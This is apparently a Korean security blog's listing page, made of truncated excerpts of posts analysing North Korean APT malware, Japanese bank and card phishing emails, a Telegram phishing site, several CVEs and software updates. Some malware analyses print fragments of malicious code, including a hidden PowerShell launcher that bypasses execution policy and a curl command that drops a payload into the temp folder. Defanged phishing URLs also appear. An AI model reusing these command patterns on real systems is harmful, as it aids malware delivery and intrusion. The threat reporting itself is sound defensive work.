스웨덴에서 기반을 두는 오픈 소스 VPN 인 Mullvad VPN 에서 CVE-2024-55884 심각한 보안 취약점이 발견되었습니다.해당 Mullvad VPN 서비스는 극강의 투명성, 물리 서버,Wire Guard를 통한 빠른 속도,RAM 서버 구축을 통한 개인정보 보호, 멀티 홉,Tailscale 파트너쉽트래픽 기록DNS 요청 기록연결이 이루어진 시각, 연결이 끊긴 시각, 연결유지시간 등 모든 종류의 타임스탬프를 포함한 연결 기록IP 주소 기록사용자 대역폭 기록들은 저장 되지 않습니다.아무튼, 개인적으로 두더지 VPN이라고 부르는 Mullvad VPN에 대한 CVE-2024-55884 심각한 보안 취약점입니다.사이버 보안 회사인 X41 D-Sec GmbH는 Mullvad VPN 애플리케이션의 화이트박..
오늘은 노드 VPN 스마트폰 IP 우회 변경 사용법(3개월 무료)에 대해 글을 적어보겠습니다. NordVPN은 유료 개인용 가상사설망 서버 이며 윈도우,MacOS,리눅스를 지원을 하고 있으며 스마트폰에서는 안드로이드와 iOS 를 지원을 하고 있습니다. 그리고 안드로이드 TV에서 사용할 수가 있습니다.노드 VPN의 본사는 데이터 보존법의 의무가 없으며 여기서 제일 중요한 것은 5개의 눈(Five Eyes), 14개의 눈 (Fourteen Eyes) 해당 동맹에서 안전하며 파나마에 있습니다.그리고 2019년 10월 29일 노드 VPN은 노-로그 감사 보고서를 공개 보안 컨설팅 회사와 파트너십을 맺고 램 서버로 인프라 교체, 버그 바운티 프로그램 그리고 2022년 6월에서는 인도는 VPN 회사와 ISP에게 5..
오늘도 대한민국의 안보를 노리는 북한 APT인 김수키(Kimsuky)에서 만든 악성코드인 열차 9월10일 원고(화)_4. bat(2024.12.02)에 대해 글을 적어 보겠습니다. 일단 해당 악성코드는 K 본부의 한민족방송에서 방송하는 대북 관련 시사 교양 프로그램인 통일열차 제작팀을 노린 것을 추정되면 통일열차 진행자는 이x걸 아나운서이며 방송시간은 매일 자정 5분부터 새벽 1시까지 입니다.일단 먼저 해당 악성코드 해쉬값은 다음과 같습니다.파일명: 열차9월10일원고(화)_4. bat사이즈:327 BytesMD5:c0b447e45be32bd6ceba8c6455472b37SHA-1:5b191427f2d47efe8a8e7bb195f1b4a9f5a2c585SHA-256:5306582c8a24508b594fed..
악의적인 목적이 있는 사람들이 워드프레스(WordPress) 직접 악용 가능한 결함이 있는 다른 플러그인을 설치하고 활성화하기 위해 Hunk Companion 플러그인의 심각한 취약점을 악용하고 있음해당 취약점은 알려진 취약점과 사용 가능한 익스플로잇이 있는 오래된 플러그인을 설치함으로써 공격자는 RCE(원격 코드 실행), SQL 삽입, XSS(교차 사이트 스크립팅) 결함으로 이어지는 대규모 결함 풀에 액세스 하거나 백도어 관리자 계정을 생성 가능취약한 플러그인 설치Hunk Companion은 사용자 정의 가능한 WordPress 테마 제공업체인 ThemeHunk에서 개발한 테마의 기능을 보완하고 향상하도록 설계된 WordPress 플러그인이므로 독립 실행형 플러그인이 라기보다는 추가 기능에 가까운데 H..
오늘은 일본 みずほ銀行(미즈호은행) 피싱 메일에 대해 간단 분석을 해보겠습니다.일단 みずほ銀行(미즈호은행)은 미쓰비시 UFJ 은행, 미쓰이스미토모은행과 함께 일본의 3대 메가뱅크 중 한 곳으로 미즈호 은행의 전신(前身)인 제일은행은 일본에서 처음으로 설립된 은행이자 일본의 첫 번째 주식회사입니다.일단 개인적으로 받은 이메일에서 있어서 한번 글을 적어 보겠습니다.이메일 내용平素より、みずほ銀行をご利用いただきありがとうございます。当社では、犯罪収益移転防止法に基づき、お取引を行う目的等を確認させていただいております。また、この度のご案内は、当社ご利用規約第5条1項3に基づくご依頼となります。お客様お客様の直近の取引についていくつかのご質問がございます、下記のリンクをアクセスし、ご回答ください。 hxxps://wh853(.)top?token..
마이크로소프트에서 제공하는 OS인 윈도우 10,윈도우 11 에 대한 각각 KB5048652,KB5048667,KB5048685 보안 업데이트가 진행이 되었습니다.윈도우 10KB5048652의 새로운 기능KB5048652 업데이트에는 장치 마더보드를 교체하고 윈도우 10이 활성화되지 못하게 하는 버그를 포함하여 Windows 10의 수많은 버그에 대한 수정 사항이 포함Sysprep /generalize]수정됨: 해당 명령은 0x80073cf 오류로 말미암아 실패 속성을 이미 제거하고 패키지를 제거하려고 할 때 발생앱 목록 백업 수정됨:Win32 바로가기가 클라우드에 백업 되지 않을 수 있음클라우드 파일 복사 수정됨: 클라우드 파일 제공자 폴더에서 파일을 끌어서 놓으면 복사본이 아닌 이동이 발생할 수 있음마..
오늘은 ROKRAT 대북 관계자를 타켓팅 하는 APT 37(Reaper,리퍼)에서 만든 악성코드-김X성강의자료.lnk(2024.12.06)에 대해 알아보겠습니다. 해당 APT 조직들은 해외 공공 및 민간 부문을 표적으로 삼는 데 중점 두고 있으며 APT 37, Reaper,Reaper Group,Red Eyes,Ricochet Chollima, ScarCruft,TA-RedAnt,Venus 121 으로 불리기도 하는 하나도 존경하고 경애하지 않고 자유대한민국의 전혀 도움되지 않는 북한의 정찰총국 산하 APT37 에서 만든 악성코드이며 개인적으로도 해당 글을 쓰는 시점인 2024.12.06 에 기준으로 적어 봅니다. 아마도 私見으로는 현재 비상계엄이니 대통령 탄핵이니 국가가 혼란한 상황에서 유포되는 시점이..
일단 해당 악성코드는 어제 작성한 글인 pay.bat에서 악성코드를 실행했을 때 드롭박스에서 연결된 파워셀 코드입니다.일단 해쉬값은 다음과 같습니다.파일명:system_first.ps1사이즈:1,532 BytesMD5:e598db51ddee48b7c351b68aebf76ebfSHA-1:60cdedb45513069a5d67310529966681bd0b4663SHA-256:ed55bb081d0e4dfeefd7af35dbb0a0481be192d3d0759631c951f7d6d5737749입니다.[소프트웨어 팁/보안 및 분석] - APT 김수키(Kimsuky)에서 만든 악성코드-pay.bat(2024.11,27) APT 김수키(Kimsuky)에서 만든 악성코드-pay.bat(2024.11,27)오늘은 APT 김..
오늘은 APT 김수키(Kimsuky)에서 만든 악성코드-pay.bat(2024.11,27)에 대해 글을 적어 보겠습니다.해당 악성코드는 배치 파일을 악용하는 것이 특징이면 일단 실행이 되면 현재 폭파된 드롭박스에서 무엇가 다운로드 하는 것 같습니다.해시파일명: pay.bat사이즈:1,687 BytesMD5:b262ac518c0114f414aaedbb4ef7c728SHA-1:fd02470c6cc4ceb5fad3589d02e5148a8c738b83SHA-256:8e0eb0d36bfd4e28ec6a10acccf899740df7048451229b84715e475e3c91347b악성코드에 포함된 코드@echo offpowershell/W 1 -ep bypass -w hidden -command $cmkGnaBV=..
오늘은 텔레그램으로 속이는 정체 모를 APT-Telegram(.)txt(.)lnk(2024.11.27)에 대해 알아보겠습니다.텔레그램은 2013년 8월 14일에 출시하고 개발 및 운영 중인 오픈 소스 모바일 메신저이며 러시아 태생의 니콜라이 두로프(Николай Дуров, Nikolai Durov),파벨 두로프 형제가 개발하여 2013년 8월에 iOS용으로 처음 출시 현재는 안드로이드·Windows, Windows Phone,리눅스,macOS,브라우저까지 지원하는 메신저이며 한때에는 카카오 톡 사찰 논란이 터지자 많은 사람이 사이버 망명을 하기도 했으면 해당 부분에서 긍정적인 부분보다 아마도 약쟁이, n번방 X착취물 제작 및 유포 사건, 2024년 텔레그램 딥페이크 음X물 유포 사건 이 대표적일 것입니..
해커 팀은 거의 전체 Windows/Office 소프트웨어 라이센스 보호를 해독했다고 주장해당 방법을 통해서 거의 모든 버전의 Windows 및 Office를 영구적으로 활성화할 수 있다고 주장윈도우 및 Office 설치에는 정품 인증이 필요뒤에서 또는 사용자가 제품 키를 입력할 때 발생할 수 있음해결 방법과 해킹은 오랫동안 사용 가능널리 사용되는 선택 중 하나는 PowerShell 프롬프터에서 한 줄의 지침을 실행하여 Windows 8 이상 또는 Office를 활성화솔루션 작성자는 이제 해당 기능을 더 많은 Windows 및 Office 제품으로 확장하는 방법을 찾았다고 주장새로운 방법은 모든 윈도우 클라이언트 또는 서버 버전에서 작동하며 ESU(확장 보안 업데이트) 및 Microsoft CSVLK(고..
모질라 재단에서 제공을 하는 브라우저인 파이어폭스 브라우저에 대한 보안 업데이트 및 반송 추적 보호 및 기타 향상된 기능이 포함된 업데이트가 진행이 되었습니다.반송 추적 방지 및 보안 수정을 포함하여 몇 가지 주요 개선 사항이 포함일부 광고주 및 데이터 브로커는 추적을 위해 리디렉션을 사용합니다. 이 프로세스는 매우 빠르게 진행되므로 사용자에게는 보이지 않음핵심 아이디어는 간단합니다. 링크를 클릭하면 대상이 열리기 전에 먼저 추적 서버가 열릴 것이고 반송 추적 보호 기능은 정기적으로 쿠키와 사이트 데이터를 삭제하여 이를 차단하는 것이 목적해당 기능은 Firefox에서 향상된 추적 방지 기능을 엄격으로 설정한 사용자에게만 활성화 기본 값이 아닙니다.쿠키와 사이트 데이터를 삭제해야만 반송 추적기에 반응하는 ..
오늘은 북한 APT인 북한 김수키(Kimsuky)양도소득 과세표준 신고 및 납부계산서로 위장한 악성코드인 out.lnk(2024.11.26)에 대해 알아보겠습니다. 소득세의 일종이며 양도소득세(讓渡所得稅)는 자산양도로 말미암아 벌어들인 자본이익에 대해 부과하는 세금을 가리키는 말이며 줄여서 양도세라 부르기도 하고 있습니다. 일단 해당 악성코드는 언제나 변하지 않는 lnk 방식으로 악성코드를 유포하는 것은 똑같습니다.해쉬값파일명:(김X경님) 양도소득 과세표준 신고 및 납부계산서.pdf.lnk사이즈:6,070 BytesMD5:adcd2bcd43a6f495facfe31e71d4e2b8SHA-1:4bdbf8733e178d50f1763d5999b58bb889138f43SHA-256:f5740e4027ad48231..
해당 워드프레스 테마는 유료 인지라 샘플을 확보하지 못한 상황에서 공개된 정보만 진행됩니다.WPLMS WordPress 테마의 임의 파일 읽기 및 삭제 취약점 때문에 28,000개의 WordPress 사이트가 영향을 주는 취약점입니다.WPLMS 2024년 10월 19일에 우리는 28,000개 이상의 판매량을 기록한 WordPress 프리미엄 테마 이면서 임의 파일 읽기 및 삭제 취약점에 대한 취약점입니다.Wordfence Premium , Word fence Care 및 Wordfence Response 사용자는 2024년 10월 28일에 이 취약점을 표적으로 하는 공격으로부터 보호하기 위한 방화벽 규칙 채용개발자는 전체 공개 세부 정보를 제공하고 나서 2024년 11월 8일에 패치를 출시WordPres..
마이크로소프트에서 제공하는 운영체제인 윈도우 11(windows 11)에서 KB5046740 미리 보기 업데이트 제공해당 업데이트는 어디까지나 사용자가 미리 해당 새로운 기능을 사용하고 싶은 경우 사용을 하시면 됩니다.KB5046740 미리 보기 업데이트는 파일 탐색기, 클립보드 기록 및 보조 디스플레이에 영향을 미치는 일부 문제를 포함하여 여러 문제에 대한 14가지 개선 사항 및 수정 사항이 포함입니다.Windows 11 KB5046740 새로운 기능시스템 트레이에는 날짜와 시간이 단축되어 표시또한, 방해 금지 토글을 켜짐으로 설정한 경우 알림 벨 아이콘이 표시되지 않을 수 있음맞춤형 경험은 이제 OOBE(Out-of-Box Experience)의 개인화된 제안권장 사항 및 제안 페이지에서 찾을 수 있..
오늘은 북한 APT Kimsuky(김수키)에서 만든 대한민국 국회 보안 문서 [자문]북한 신형 자폭드론 으로 위장한 악성코드(2024.9.12)에 대해 글을 적어보겠습니다.일단 실행을 하면 북한 신형 자폭 드론 으로 돼 있으며 당시 러시아-우크라이나 전쟁으로 뜨거웠던 내용 인지라 해당 관련해서 노렸던 것 같습니다.일단 msc 확장자로 되어져 있으며 8~9월 당시 악성코드라서 지금은 구글 문서 쪽은 동작 안 할 것입니다.파일명:[자문]북한 신형 자폭드론.msc사이즈:146,707 BytesMD5:391fa4e57f91e3422ef5d32523d4dfc7SHA-1:f535a3faed62e48d588e190f372785ae9efcadb4SHA-256:57e9b7d1c18684a4e8b3688c454e83283..
Apple은 몇 가지 제로데이 취약점을 패치 하려고 macOS에 대한 중요 업데이트를 제공보안 패치는 iPhone 및 iPad에서도 사용할 수 있음보안 공격의 표적이 되는 Intel 기반 Mac 15.1.1 업데이트 macOS Sequoia에는 2가지 보안 수정 사항이 포함되어 있으며 둘 다 Safari에 영향 주는 취약점해당 취약점은 Google의 위협 분석 그룹에 속한 두 명의 보안 전문가인 Clément Lecigne과 Benoît Sevens에 의해 발견조사 결과를 Apple에 보고했으며 Apple은 이 문제가 해커에 의해 적극적으로 악용되었을 수 있음을 인식하고 있음을 확인공격에 대한 자세한 내용은 공개되지 않음첫 번째 패치는 CVE-2024-44308로 추적되는 문제에 대한 것이며 JavaSc..
오늘은 북한 APT Kimsuky(김수키)에서 만든 좀 미팅(Zoom Meeting) 사칭 악성코드인 Zoom Meeting(2024.9.28)에 대해 글을 적어 보겠습니다.해당 악성코드는 줌 비디오 커뮤니케이션 (Zoom Video Communications)에서 만든 줌(Zoom) 은 원격 회의, 채팅, 전화, 비즈니스용 이메일 및 캘린더를 포함한 통합 커뮤니케이션 서비스 (UCaaS) 플랫폼입니다. 해당 악성코드는 일단 아이콘부터 좀처럼 생겼지만, 그것은 아니고 msc 형식 방식을 취하는 것이 특징입니다. 일단 msc 내부 까보면 다음과 같은 코드들이 핵심입니다.악성 행위 핵심코드"C:\Windows\System32\cmd(.)exe" /c mode 15,1&curl -o "%temp%\zoom(...
오늘은 우리의 민족인 북한 해킹 단체 김수키(Kimsuky)에서 만든 피싱(Phishing) 사이트이며 일단 기본적으로 해당 사이트를 통째로 백업 못해서 일단 확보한 샘플 로만 진행이 되면 2024.8월에 있었던 것이므로 지금 하고 상관은 없지만 뭐~로그인 관련 있는 것 보면 해당 대학교 교수, 교직원, 학생들의 피해는 있었을 것입니다. 일단 뭐~당연히 시각적으로 공식 동덕여자대학교하고 똑같지만 다른 사이트입니다.일단 로그인 관련 부분부터 보겠습니다.로그인 코드j_password.value = password.value; //if (true) { // var rsa = new RSAKey(); // rsa.setPublic('d00d4c25e92(3)ed2126c2ffda4b5bfbf7d35a..
마이크로소프트에서 제공하는 운영체제인 윈도우 10,윈도우 11 에 대한 보안 업데이트가 KB5046613,KB5046617,KB5046633 각각 진행이 되었습니다.윈도우 KB5046613 업데이트Windows 커널 취약 드라이버 차단 목록 파일(DriverSiPolicy.p7b) 수정:업데이트는 BYOVD(Bring Your Own Vulnerable Driver) 공격의 위험이 있는 드라이버 목록에 추가시작 메뉴: 시작 메뉴에서 새 계정 관리자의 출시를 시작새로운 디자인을 통해 계정을 쉽게 확인하고 계정 설정에 액세스할 수 있습니다.다른 사용자로 변경하려면 로그아웃 옆에 있는 줄임표(...)를 선택잠금 명령이 전원 메뉴에 있음복합기(MFP): USB 케이블을 사용하여 연결하면 원할 때 특정 네트워크 ..
오늘은 로그인 정보를 훔치는 것으로 추정되는 북한 APT 김수키(Kimsuky)만든 악성코드-. lnk(2024.11.8)에 대해 글을 적어보겠습니다.먼저 악성코드 해시값은 다음과 같습니다.파일명:.lnk사이즈:5.92 KBMD5:b7de564386ab778046b1dd3ef76e4b5eSHA-1:baa69876baa6861db5736c58d2eded93dd1bec6eSHA-256:e13ad0ebaac36ec363eba5760e69cb995dcae7dcc6afc01bbb31642c3c175d61악성코드 내부 모습StringData{ namestring: Type: Text Document Size: 5.23 KB Date modified: 01/02/2020 11:23 relativ..
오늘은 북한 APT 인 Konni(코니)에서 만든 악성코드-1. 알티피_엔지니어링본부 사업개발회의 자료.hwp.lnk(2024.6.28)에 대해 글을 적어보겠습니다.AutoIt(au3) 스크립트를 사용하는 것이 특징이며 아직은 해당 스크립트 방식으로 백신 프로그램 엔진들이 파일 된 파일의 실행 방법에 숙달하지 않았기 때문에 이러한 유형의 공격에 대응하기 위해 해결이 필요합니다.컴파일된 코어 페이로드는 AutoIt 도구를 사용하여 명령을 읽고 실행한 다음 Windows 시스템에서 지정된 악성 행위 을 수행AutoIt은 Windows GUI 및 일반 스크립팅 프로그래밍을 자동화하기 위한 무료 스크립팅 언어해쉬파일명:1. 알티피_엔지니어링본부 사업개발회의 자료.hwp.lnk사이즈:2.03 MBMD5:87dc4..
크리스토프 두메즈가 개발한 비트토렌트 클라이언트 소프트웨어인 큐빗토렌트(qBittorrent) 에서 14년 동안 사용자를 MitM 공격에 노출하는 결함 취약점 수정되었습니다.qBittorrent는 앱 전체에서 다운로드를 관리하는 구성 요소인 애플리케이션의 DownloadManager에서 SSL/TLS 인증서를 검증하지 못해 발생하는 원격 코드 실행 결함을 해결2010년 4월 6일 커밋에서 소개된 해당 결함은 14년 이상 지난 2024년 10월 28일 최신 릴리스 버전 5.0.1에서 결국 수정qBittorrent는 BitTorrent 프로토콜을 통해 파일을 내려받고 공유할 수 있는 무료 오픈 소스 클라이언트크로스 플랫폼 특성, IP 필터링,통합 검색 엔진,RSS 피드 지원 및 최신 Qt 기반 인터페이스로 ..
모질라 에서 제공을 하는 브라우저인 파이어폭스에서 Firefox 132 Microsoft PlayReady 지원, 추적 보호 개선 등을 포함하여 여러 가지 주요 변경 사항이 포함세부사항:Microsoft PlayReady 지원으로 최대 4K 재생 지원이 가능합니다.넓은 색 영역 WebGL을 사용하면 더 넓은 범위의 색상을 표시할 수 있음향상된 추적 보호 엄격 모드는 타사 쿠키를 차단Firefox 132: 주요 변경 사항마이크로소프트 플레이레디Windows용 Mozilla Firefox는 선택 사이트에 대해 Microsoft PlayReady 지원을 받고 있습니다. 이를 통해 주요 스트리밍 파트너와 함께 1080p 기본 재생 및 4K Ultra HD 지원이 가능Mozilla는 어떤 사이트나 스트리밍 파트너..
오늘은 일본의 신용카드사 중 모든 면에서 가장 큰 규모를 가지고 있으며 일본의 은행연합 신용카드사이면서 1961년 동양신탁은행(東洋信託銀行, 현 미쓰비시UFJ신탁은행),일본신판주식회사(日本信販株式会社, 현 미쓰비시UFJ니코스),산와은행(三和銀行, 현 미쓰비시 UFJ 은행) 삼사가 공동 출자하여 설립한 일본크레딧뷰로(Japan Credit Bureau)를 기원인 JCB 카드 이용내용으로 위장하는 피싱 메일을 한번 살펴보겠습니다.피싱 내용次回のお振替内容が確定しました。MyJCBにログインのうえご確認ください。お振替日は毎月10日(金融機関休業日の場合は翌営業日)です。※「カードご利用代金明細書」をお送りしている方のうち、「おしらせメール」に登録されている方に、毎月本メールをお送りしています。▼MyJCBログインはこちらhxxp://zt..
오늘은 세계적으로 유명한 APT 조직 APT 북한 APT 리퍼(Reaper,APT37)에서 만든 탈북민 사칭 한국해양수산연수원 타겟 인것으로 추측이 되는 악성코드-이력서.lnk(2024.11.1)에 대해 글을 적어보겠습니다. 일명 RoKRAT한국해양수산연수원 이라는 것이 해양수산인력의 교육 등의 업무를 하는 해양수산부 산하 기타공공기관입니다.일단 해당 악성코드는 이력서 PDF는 누군가의 이력서를 훔쳐서 작성된 것으로 보이면 한국해양수산연수원 으로 접근을 하는것 같습니다.해쉬값파일명:이력서.lnk사이즈:221 MBMD5:89c0d2cc1e71b17449eec454161d60daSHA-1:e9528f09f1e58ffc308893087f4a8b77aa1d544dSHA-256:707e8cb56f32209ca83..
오늘은 북한 김수키(Kimsuky) 세종연구소 한반도전략센터장을 사칭 하는 악성코드-CHEONG ??? Chang Essay FINAL.msc(2024.9.25)에 대해 글을 적어 보겠습니다. 일단 한 달 전에 확보한 샘플인데 나중에 쓸려고 사실상 내버려둬 두었던 샘플을 지금 쓰게 됩니다. 일단 해당 악성코드 세종 연구소를 타겟을 하고 있으며 세종 연구소 나는 모르겠다. 하면 1983년 12월 설립된 외교부 소관 국가정책연구재단이며 남북의 창이나 TV 뉴스 볼 때마다 본 연구소 소속 연구원 분들입니다.아마도 세종 연구소에 계시는 한반도전략센터장 분을 이름이 있는 것 보니 한반도전략센터장이라고 이름을 도용해서 대북 관계자 분들을 노리는 방법이 아닐까 생각이 됩니다. 일단 악성코드 해시 값입니다.파일명:??..
오늘은 엑시노스 SoC의 설계와 개발은 삼성 S.LSI 사업부에서, 생산은 파운드리 사업부에서 담당하고 있으며 미국, 중국 등 법적 문제가 복잡한 일부 국가에서는 퀄컴의 퀄컴 스냅드래곤이 고정적으로 사용되고 삼성 스마트폰과 태블릿에 사용되고 있습니다. CVE-2024-44068은 삼성 m2m1shot_scaler0 장치 드라이버 페이지 use-after-free입니다. 일단 개인적으로 전문가가 아니니까? 오류가 있을 수가 있습니다.영향을 받는 버전: Samsung Exynos(9820,9825,980,990,850 W920),SMR-2024년 10월 이전일단 공개된 정보를 가지고만 진행을 하겠습니다.Use-After-Free 취약점Heap 영역에서 할당된 (malloc) 공간을 free로 영역을 해제하고..
오늘은 텔레그램 사용자 정책 위반 사칭 피싱(Phishing) 사이트-telegram-df(.)org(2024.10.22)에 대해 알아보겠습니다.최근에는 러시아 태생의 니콜라이 두로프(Николай Дуров, Nikolai Durov) 파벨 두로프 형제가 개발하여 2013년 8월에 iOS용으로 처음 출시 현재는 안드로이드,Windows,Windows Phone,리눅스,macOS,브라우저 까지 지원하는 메신저이며 뭐 보안이 좋다고 하지만 다 허점이 있으며 보안 메신저 들도 한 놈이 사고 치면 다 잡히게 되어져 있습니다.일단 해당 텔레그램은 딥페이크(Deepfake) 때문에 문제가 되는 메신저입니다.일단 해당 텔레그램을 계정이 사용정책이 위반했다고 피싱 사이트로 유도를 하는 방식을 취하고 있습니다.해당 피..
오늘도 우리 주적인 북한에서 만든 국립 한국해양대학교를 노린 2019년 졸업자 취업통계조사 붙임. chm(2024.7.8)애 대해 알아보겠습니다.일단 악성코드 해쉬값은 다음과 같습니다.파일명:2019년 졸업자 취업통계조사 붙임.chm사이즈:189 KBMD5:972be4aec6506e8bf4dc8d72491099f6SHA-1:bd9fc2efbd48468014b72717549ae2d12b47b247SHA-256:8bbcbe5da611925fbe71c6b4b3ec34697b0ec4de4b9940e19ac94ff8f62e8d6f취업률현황이라는 제목으로 보면 수능 치시는 고등학생들이 목표인 것을 추측할 수가 있습니다. 물론 재수생도 포함이겠죠.악성코드 내용2019년 졸업생 학부(과)별 취업률 및 유지취업률 201..